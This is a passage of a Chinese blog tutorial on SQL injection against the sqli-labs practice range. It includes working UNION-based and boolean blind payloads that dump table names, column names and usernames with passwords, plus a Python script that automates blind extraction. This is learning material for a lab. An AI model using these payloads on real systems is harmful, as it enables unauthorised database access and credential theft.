<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/avatar.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/avatar-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/avatar-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"muxiahuo.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideDownBigOut"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta property="og:type" content="article">
<meta property="og:title" content="sql注入">
<meta property="og:url" content="https://muxiahuo.github.io/2024/07/27/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="一只鼍的博客 | Glory&#39;s blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-1.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-2.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-2-1.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/%E6%95%B0%E5%80%BC%E9%97%AD%E5%90%88.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/%E5%AD%97%E7%AC%A6%E9%97%AD%E5%90%88.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/and1=1.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/and1=2.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/orderby.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/select.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-%E7%88%86%E5%BA%93.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-%E7%88%86%E8%A1%A81.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-%E7%88%86%E8%A1%A82.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-%E7%88%86%E5%88%97.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql1-%E7%88%86%E5%AD%97%E6%AE%B5.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql5-length.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql5-column.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql5-id.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql9-time1.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql9-time2.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql11-post.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql11-1.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql11-2.png">
<meta property="og:image" content="https://muxiahuo.github.io/images/sql/sql13-post.png">
<meta property="article:published_time" content="2024-07-27T11:38:08.000Z">
<meta property="article:modified_time" content="2024-08-08T11:43:01.871Z">
<meta property="article:author" content="muxiahuo">
<meta property="article:tag" content="注入">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://muxiahuo.github.io/images/sql/sql1-1.png">


<link rel="canonical" href="https://muxiahuo.github.io/2024/07/27/sql%E6%B3%A8%E5%85%A5/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://muxiahuo.github.io/2024/07/27/sql%E6%B3%A8%E5%85%A5/","path":"2024/07/27/sql注入/","title":"sql注入"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sql注入 | 一只鼍的博客 | Glory's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">一只鼍的博客 | Glory's blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">无欲无求，笑口常开</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80"><span class="nav-number">2.</span> <span class="nav-text">sql注入基础</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#get%E8%AF%B7%E6%B1%82"><span class="nav-number">3.</span> <span class="nav-text">get请求</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="nav-number">3.1.</span> <span class="nav-text">判断注入点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E9%97%AD%E5%90%88%E6%96%B9%E5%BC%8F"><span class="nav-number">3.2.</span> <span class="nav-text">判断闭合方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5"><span class="nav-number">3.3.</span> <span class="nav-text">联合注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.4.</span> <span class="nav-text">布尔盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.5.</span> <span class="nav-text">时间盲注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#post%E8%AF%B7%E6%B1%82"><span class="nav-number">4.</span> <span class="nav-text">post请求</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5-1"><span class="nav-number">4.1.</span> <span class="nav-text">联合注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8-1"><span class="nav-number">4.2.</span> <span class="nav-text">布尔盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">4.3.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#extractvalue%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">4.3.1.</span> <span class="nav-text">extractvalue报错注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#updatexml%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">4.3.2.</span> <span class="nav-text">updatexml报错注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#group-by%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">4.3.3.</span> <span class="nav-text">group by报错注入</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87"><span class="nav-number">5.</span> <span class="nav-text">绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9B%BF%E6%8D%A2%E7%BB%95%E8%BF%87"><span class="nav-number">5.1.</span> <span class="nav-text">替换绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">5.2.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="nav-number">5.3.</span> <span class="nav-text">空格绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%BB%E8%BE%91%E8%BF%90%E7%AE%97%E7%AC%A6%E7%BB%95%E8%BF%87"><span class="nav-number">5.4.</span> <span class="nav-text">逻辑运算符绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87"><span class="nav-number">5.5.</span> <span class="nav-text">宽字节绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="nav-number">5.6.</span> <span class="nav-text">编码绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%93%E8%AF%AD"><span class="nav-number">5.6.1.</span> <span class="nav-text">结语</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="muxiahuo"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">muxiahuo</p>
  <div class="site-description" itemprop="description">做一只自由的鼍</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://muxiahuo.github.io/2024/07/27/sql%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="muxiahuo">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="一只鼍的博客 | Glory's blog">
      <meta itemprop="description" content="做一只自由的鼍">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="sql注入 | 一只鼍的博客 | Glory's blog">
      <meta itemprop="description" content=" ">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-07-27 19:38:08" itemprop="dateCreated datePublished" datetime="2024-07-27T19:38:08+08:00">2024-07-27</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-08-08 19:43:01" itemprop="dateModified" datetime="2024-08-08T19:43:01+08:00">2024-08-08</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>16k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>14 分钟</span>
    </span>
</div>

            <div class="post-description"> </div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>&emsp;&emsp; 当用户输入账号和密码的时候，web应用会向后台数据库进行一个匹配，如果账号密码正确就会登入。而这个数据库例如MySQL,Oracle等一系列用的语句叫做sql语句，那么我们在传数据的时候，使用sql语句上传就会改变一个原有的结构，从而获取或修改数据库中的数据，而这个，就叫做sql注入。</p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>&emsp;&emsp;那么在做sql注入的时候，建议先看一下sql语句的基础语法，懂得基础才能理解得更加深刻,OK，在学这个之前，我们要搭配着靶场去使用，实践出来的效果更佳。点击<a target="_blank" rel="noopener" href="https://blog.csdn.net/Joker_Dgh/article/details/123913722">靶场环境搭建</a>,当做一个游戏去玩，通关即为胜利（注意php版本要选择5.x版本）</p>
<h2 id="sql注入基础"><a href="#sql注入基础" class="headerlink" title="sql注入基础"></a>sql注入基础</h2><p>&emsp;&emsp;我们就直接讲思路什么的了，语法基础和逻辑自行去b站了解。</p>
<h2 id="get请求"><a href="#get请求" class="headerlink" title="get请求"></a>get请求</h2><h3 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h3><p>&emsp;&emsp;注入点分为数字型和字符型（输入字符默认为字符型）。两者的判断方式可以<font color=blue>用id&#x3D;2-1来测试，如果是数字型的，回显的样式应该是id&#x3D;1的情况，如果是字符型的，回显的样式应该是id&#x3D;2的情况。</font><br><img data-src="/images/sql/sql1-1.png" alt="sql1-1"><br>&emsp;&emsp;这是id为1时的name和password<br><img data-src="/images/sql/sql1-2.png" alt="sql1-2"><br>&emsp;&emsp;这是id为2时的name和password<br><img data-src="/images/sql/sql1-2-1.png" alt="sql1-2-1"><br>&emsp;&emsp;这是id为2-1的name和password，很明显，和2的情况是一样的，所以这是字符型。</p>
<h3 id="判断闭合方式"><a href="#判断闭合方式" class="headerlink" title="判断闭合方式"></a>判断闭合方式</h3><p>&emsp;&emsp;如果是字符型的话，根据语法，既然我们要重新构造一个语句，我们就得把后面的原本语句注释掉，因此我们数值后面需要添加闭合符，语句结尾需要添加注释符。闭合方式有<br><img data-src="/images/sql/%E6%95%B0%E5%80%BC%E9%97%AD%E5%90%88.png" alt="数值闭合"><br><img data-src="/images/sql/%E5%AD%97%E7%AC%A6%E9%97%AD%E5%90%88.png" alt="字符闭合"><br>&emsp;&emsp;然而注释符目前只找到–+(– q),#,%23这三种，判断的方法也很简单，如果<font color=red>所使用的闭合方式结果一样，那么说明不是该闭合方式。反之就是(同时还应判断是否需要添加括号)</font>打个比方，如果输入1”and 1&#x3D;1– q 和 1”and 1&#x3D;2 –q 两次的回显结果一样，说明闭合方式不是双引号，其他同理。原理就不用多讲了吧，如果真是闭合符的话，and后面一真一假，后者肯定报错。<br><img data-src="/images/sql/and1=1.png" alt="and1=1"><br><img data-src="/images/sql/and1=2.png" alt="and1=2"><br>&emsp;&emsp;回显不一样，闭合符号为’（可以试试双引号是否回显是一样）</p>
<h3 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>联合注入</h3><p>&emsp;&emsp;ok啊，知道闭合方式和注释符之后，我们就可以往期间穿插语句了，那么我们就要学习sql注入的第一步联合注入。<br>&emsp;&emsp;第一步:order by X判断列数，X递增往上加，<font color=blue>如果报错就是超过列数，显示正常就是没有超出，就继续往上加，直到报错退回来。</font><br><img data-src="/images/sql/orderby.png" alt="orderby"><br>&emsp;&emsp;可以看到4报错了，我们就退回来，说明列数只有三列。</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=<span class="number">1</span>&#x27; order <span class="keyword">by</span> <span class="number">3</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;第二步:union select X判断显示位，先输入1,2,3……看页面回显，能回显的我们就可以再改成语句。当然做这一步的时候，我们需要让前面数据库查询不到，从而列举出后面的列。通常改为负数就可。<br><img data-src="/images/sql/select.png" alt="select"><br>&emsp;&emsp;可以看到2，3被回显出来，因此可以在2，3的位置插入语句。</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-<span class="number">1</span><span class="symbol">&#x27;union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;第三步:爆库(不爆也行)，爆表，爆列，爆字段。可以插入语句了，我们就使用固定公式就可以了。<br>&emsp;&emsp;爆库,这里为security<br><img data-src="/images/sql/sql1-%E7%88%86%E5%BA%93.png" alt="sql1-爆库"></p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-<span class="number">1</span><span class="symbol">&#x27;union</span> <span class="keyword">select</span> <span class="number">1</span>,database(),<span class="number">3</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;爆表，这里emails,referers,uagents,users<br><img data-src="/images/sql/sql1-%E7%88%86%E8%A1%A81.png" alt="sql1-爆表1"><br>&emsp;&emsp;这是因为2列语句太长了，我们放3列就行<br><img data-src="/images/sql/sql1-%E7%88%86%E8%A1%A82.png" alt="sql1-爆表2"></p>
<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">-1</span>&#x27;<span class="built_in">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.<span class="built_in">tables</span> <span class="built_in">where</span> table_schema=database()--+</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;爆列，注意，表名也就是table_name要视情况而判断，要看哪个表就用查哪个表.<br><img data-src="/images/sql/sql1-%E7%88%86%E5%88%97.png" alt="sql1-爆列"></p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attribute">id</span>=-1&#x27;union select 1,2,group_concat(column_name) <span class="keyword">from</span> information_schema.columns where <span class="attribute">table_name</span>=<span class="string">&#x27;users&#x27;</span>--+</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;爆字段，直接查询你要想要看的数据，例如有flag的话，就可以直接查了。<br><img data-src="/images/sql/sql1-%E7%88%86%E5%AD%97%E6%AE%B5.png" alt="sql1-爆字段"></p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="built_in">id</span>=<span class="number">-1</span>&#x27; union select <span class="number">1</span>,<span class="number">2</span>,group_concat(username ,<span class="built_in">id</span> , password) <span class="keyword">from</span> users<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp; * from table_name也可以全部列出来。</p>
<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p>&emsp;&emsp;学会了联合注入的方法后，前四关无压力，第五关测试的时候发现查询不到结果，像是这种的，我们可以使用布尔盲注，区别就是盲注不是返回查询到的结果，而只是返回查询是否成功，即<font color=red>返回查询语句的布尔值</font>,也就是真和假的判断。因为我们对内部数据库的信息了解甚少，所以盲注没有固定的公式，需要进行一定的修改。大致思路是这样的:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">爆库名长度</span><br><span class="line">根据库名长度爆库名</span><br><span class="line">对当前库爆表数量</span><br><span class="line">根据库名和表数量爆表名长度</span><br><span class="line">根据表名长度爆表名</span><br><span class="line">对表爆列数量</span><br><span class="line">根据表名和列数量爆列名长度</span><br><span class="line">根据列名长度爆列名</span><br><span class="line">根据列名爆数据值</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;总结来说就是跟上面差不多的，爆库，爆表，爆列，爆字段。只不过这个更加细节一点，用的方法也不一样。常用函数<code>substr(str,from,length)</code>返回从下标为from截取长度为length的str子串。其中，<font color=black>首字符下标为1</font>,<code>length(str)</code>返回str串长度。<br>&emsp;&emsp;大致步骤如下:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attribute">id</span>=1&#x27;and length((select database()))&gt;9--+</span><br><span class="line"><span class="comment">#大于号可以换成小于号或者等于号，主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4</span></span><br><span class="line">?<span class="attribute">id</span>=1&#x27;and ascii(substr((select database()),1,1))=115--+</span><br><span class="line"><span class="comment">#substr(&quot;78909&quot;,1,1)=7 substr(a,b,c)a是要截取的字符串，b是截取的位置，c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗，这样我们可以很好确定数字根据数字找到对应的字符。</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">?<span class="attribute">id</span>=1&#x27;and length((select group_concat(table_name) <span class="keyword">from</span> information_schema.tables where <span class="attribute">table_schema</span>=database()))&gt;13--+</span><br><span class="line">判断所有表名字符长度。</span><br><span class="line">?<span class="attribute">id</span>=1&#x27;and ascii(substr((select group_concat(table_name) <span class="keyword">from</span> information_schema.tables where <span class="attribute">table_schema</span>=database()),1,1))&gt;99--+</span><br><span class="line">逐一判断表名</span><br><span class="line"> </span><br><span class="line">?<span class="attribute">id</span>=1&#x27;and length((select group_concat(column_name) <span class="keyword">from</span> information_schema.columns where <span class="attribute">table_schema</span>=database() <span class="keyword">and</span> <span class="attribute">table_name</span>=<span class="string">&#x27;users&#x27;</span>))&gt;20--+</span><br><span class="line">判断所有字段名的长度</span><br><span class="line">?<span class="attribute">id</span>=1&#x27;and ascii(substr((select group_concat(column_name) <span class="keyword">from</span> information_schema.columns where <span class="attribute">table_schema</span>=database() <span class="keyword">and</span> <span class="attribute">table_name</span>=<span class="string">&#x27;users&#x27;</span>),1,1))&gt;99--+</span><br><span class="line">逐一判断字段名。</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">?<span class="attribute">id</span>=1&#x27; <span class="keyword">and</span> length((select group_concat(username,password) <span class="keyword">from</span> users))&gt;109--+</span><br><span class="line">判断字段内容长度</span><br><span class="line">?<span class="attribute">id</span>=1&#x27; <span class="keyword">and</span> ascii(substr((select group_concat(username,password) <span class="keyword">from</span> users),1,1))&gt;50--+</span><br><span class="line">逐一检测内容。</span><br><span class="line"> </span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;要根据注释去修改数值和属性。（建议手打和尝试修改后的变化，更加有印象）<font color=red>注:这是闭合符的判断还是和前面的一样。</font><br>&emsp;&emsp;这里是用等于号测试的，<font color=blue>细节1:先测试1&#x3D;1为真的回显，再看length执行的时候为真的页面，这里等于8是说明数据库的长度为8</font><br><img data-src="/images/sql/sql5-length.png" alt="sql5-length"></p>
<p>&emsp;&emsp;得出来长度后，我们就可以用ascii码去遍历一下，人工是不是很麻烦，拜托，咱们是计算机，要用编程~当然，数据库我们同样也可以用脚本跑出来。</p>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://sql-labs:3601/Less-5/&#x27;</span>  <span class="meta"># 目标URL</span></span><br><span class="line">flag = <span class="string">&quot;You are in...&quot;</span>  <span class="meta"># 设置一个回显成功的字样</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def get_database_length():</span><br><span class="line">    global url, flag  <span class="meta"># 全局变量</span></span><br><span class="line">    <span class="keyword">length</span> = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>):</span><br><span class="line">        payload = f<span class="string">&quot;?id=1&#x27; and length((select database()))=&#123;length&#125;--+&quot;</span></span><br><span class="line">        response = requests.get(url + payload).text</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">not</span> in response:</span><br><span class="line">            <span class="keyword">length</span> += <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">print</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;数据库长度为&quot;</span>, <span class="keyword">length</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">length</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;获取数据库长度&quot;</span>)</span><br><span class="line">    <span class="keyword">length</span> = get_database_length()</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;回显长度为8，下一步遍历获取数据库名。根据上面提供的公式想好要改变哪些数，<font color=blue>细节2:ascii常规字符为0-127区间内，其中A(65)-Z(90),a(97)-z(122)</font></p>
